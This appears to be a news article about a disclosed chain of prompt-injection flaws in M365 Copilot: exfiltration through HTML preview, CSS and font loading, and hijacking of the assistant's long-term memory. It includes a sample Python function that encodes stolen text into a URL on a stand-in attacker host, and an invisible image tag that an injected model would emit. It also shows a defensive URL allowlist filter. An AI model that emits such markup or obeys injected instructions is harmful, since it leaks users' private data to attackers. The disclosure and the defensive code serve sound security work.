Security Researcher Discloses Data Exfiltration Chain in Microsoft Copilot; CVE-2026-24299 Now Patched
Key Takeaways
- Multiple chained vulnerabilities in M365 Copilot enabled sophisticated data exfiltration attacks through HTML preview, CSS, and font-loading bypass techniques
- Attackers could hijack Copilot's long-term memory system and install persistent backdoors through prompt injection
- The vulnerabilities demonstrate the critical security risk when AI agents have simultaneous access to private data, untrusted content, and external communication channels
Summary
Security researcher kerng has published a comprehensive writeup, presented at DEF CON Singapore, of vulnerabilities discovered in Microsoft Copilot and M365 Copilot. The research details a chain of exploits enabling data exfiltration and persistent backdoor installation, including attacks via HTML preview features, CSS-based bypass techniques, delayed tool invocation tricks, and hijacking of Copilot's long-term memory system.
The vulnerabilities demonstrate what the researcher calls the "lethal trifecta" in AI security: M365 Copilot's access to private corporate data (emails, chats, SharePoint documents), combined with its ingestion of untrusted content and its access to external communication channels, creates a broad attack surface for indirect prompt injection. The exploit chain allows attackers to extract sensitive information, maintain persistent backdoors, and manipulate Copilot's stored memories through carefully crafted prompts.
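The core exfiltration pattern behind this class of attacks can be sketched in a few lines. This is an illustrative reconstruction, not the researcher's actual payload: the attacker host, function name, and encoding scheme below are hypothetical. The idea is that injected instructions make the model emit markup pointing at an attacker-controlled URL; when the client's HTML preview auto-fetches that resource (an image, CSS background, or font), the fetch itself transmits the data embedded in the query string.

```python
import base64
import urllib.parse

# Hypothetical attacker-controlled collection endpoint.
ATTACKER_HOST = "https://attacker.example/log"

def build_exfil_url(secret: str) -> str:
    """Encode stolen text into a URL query string. If the chat client
    auto-renders the resource, the outbound request leaks the data."""
    payload = base64.urlsafe_b64encode(secret.encode()).decode()
    return f"{ATTACKER_HOST}?d={urllib.parse.quote(payload)}"

# An injected prompt would instruct the model to emit markup like this;
# the 1x1 image is invisible to the user but still fetched by the preview.
markup = f'<img src="{build_exfil_url("Q3 revenue: $12.4M")}" width="1" height="1">'
```

Blocking the obvious `<img>` case is why the research explores CSS and font-loading bypasses: any markup feature that triggers an automatic outbound fetch can serve as the exfiltration channel.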
Microsoft was notified of these vulnerabilities in 2023 and assigned CVE-2026-24299 to track them. All identified issues have now been patched. The research highlights systemic challenges in securing enterprise AI deployments and aligns with historical data exfiltration issues previously discovered in Bing Chat, ChatGPT, Claude, Gemini, and GitHub Copilot.
While Microsoft has patched all identified issues, the research reveals ongoing challenges in securing enterprise AI systems: the vulnerability class is endemic across the industry, with most major AI platforms having required patches for similar prompt injection and data exfiltration flaws.
Editorial Opinion
This research underscores a fundamental architectural challenge in enterprise AI deployment. When intelligent agents have access to sensitive corporate data while operating on untrusted external content, the attack surface becomes enormous, and mitigation strategies that focus only on output channels are insufficient. The industry needs a paradigm shift toward zero-trust threat modeling for AI agents, with strict guardrails on what actions and data access these systems are actually granted, rather than retrofitting security measures onto systems designed with permissive defaults.
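One concrete zero-trust control is to treat every URL in model output as untrusted until proven otherwise. The sketch below, with a hypothetical allowlist and function name, shows an output-channel filter that strips links to unapproved hosts before the client renders the response. It is a minimal illustration of the principle, not Microsoft's actual mitigation:

```python
import re
from urllib.parse import urlparse

# Hypothetical allowlist; a real deployment would manage this centrally.
ALLOWED_HOSTS = {"learn.microsoft.com", "github.com"}

URL_RE = re.compile(r"https?://[^\s\"'<>)]+")

def strip_untrusted_urls(ai_output: str) -> str:
    """Replace any URL whose host is not explicitly allowlisted, so a
    prompt-injected exfiltration link is neutralized before rendering."""
    def _check(match: re.Match) -> str:
        host = urlparse(match.group(0)).hostname or ""
        return match.group(0) if host in ALLOWED_HOSTS else "[link removed]"
    return URL_RE.sub(_check, ai_output)
```

An allowlist (rather than a blocklist) matters here: the bypass techniques in the research show that attackers reliably find new fetch-triggering markup, so only explicitly trusted destinations should survive filtering.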